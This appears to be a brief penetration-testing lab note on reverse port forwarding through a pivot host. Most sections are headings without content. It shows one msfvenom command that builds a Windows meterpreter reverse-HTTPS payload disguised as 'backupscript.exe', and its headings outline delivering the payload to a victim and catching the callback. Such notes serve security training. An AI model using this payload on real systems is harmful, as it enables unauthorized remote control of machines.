Reverse Port Forwarding

Sample Scenario

Creating a payload using MSFVenom

$ msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

Using multi/handler in MSFConsole

Transferring the payload to the Pivot Host

Starting Web Server on Pivot Host

Download the File on the Victim Host

Using SSH -R in our Attacker Machine


Using meterpreter's portfwd

Configuring and starting multi/handler

Last updated